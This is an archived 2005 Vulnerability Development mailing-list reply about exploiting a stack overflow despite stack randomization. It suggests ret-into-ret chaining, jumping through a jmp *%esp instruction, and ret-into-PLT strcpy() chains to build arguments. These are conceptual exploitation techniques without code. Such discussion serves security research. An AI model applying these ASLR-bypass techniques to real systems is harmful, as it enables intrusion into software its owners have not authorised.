Vulnerability Development mailing list archives
Re: Randomized Stack
From: Oldani Massimiliano <sgrakkyu () antifork org>
Date: Fri, 25 Nov 2005 17:47:42 +0100
On Nov 23, 2005, at 10:21 PM, veider () ank-pki ru wrote:
Stack random? only random stack? or with random mmap()/stack and no-exec workaround ? If you have only random stack and you can execute code in the stack, you can check for interesting pointer in the stack and chain a ret-into-ret until you get itHello, All!I am trying to exploit a stack based overflow on a system with stack randomization. Knowing function addresses with "objdump -D" I am ableto run thouse functions. I've read phrack article about bypassingPaX ASLR, but there the author is able to control function arguments that isimpossible in my case. Any ideas on what i may try? Bye, All.
or find somewhere jmp *%esp instruction and jump on your payload.Alternatively you can construct argument with ret-into-PLT strcpy() chain in some RW place and then use them.
----------- Oldani (sgrakkyu) Massimiliano Antifork Research, Inc. Metro Olografix
Current thread:
- Randomized Stack veider (Nov 24)
- Re: Randomized Stack Oldani Massimiliano (Nov 25)
- Re: Randomized Stack Rik Bobbaers (Nov 28)
- Re: Randomized Stack Oldani Massimiliano (Nov 25)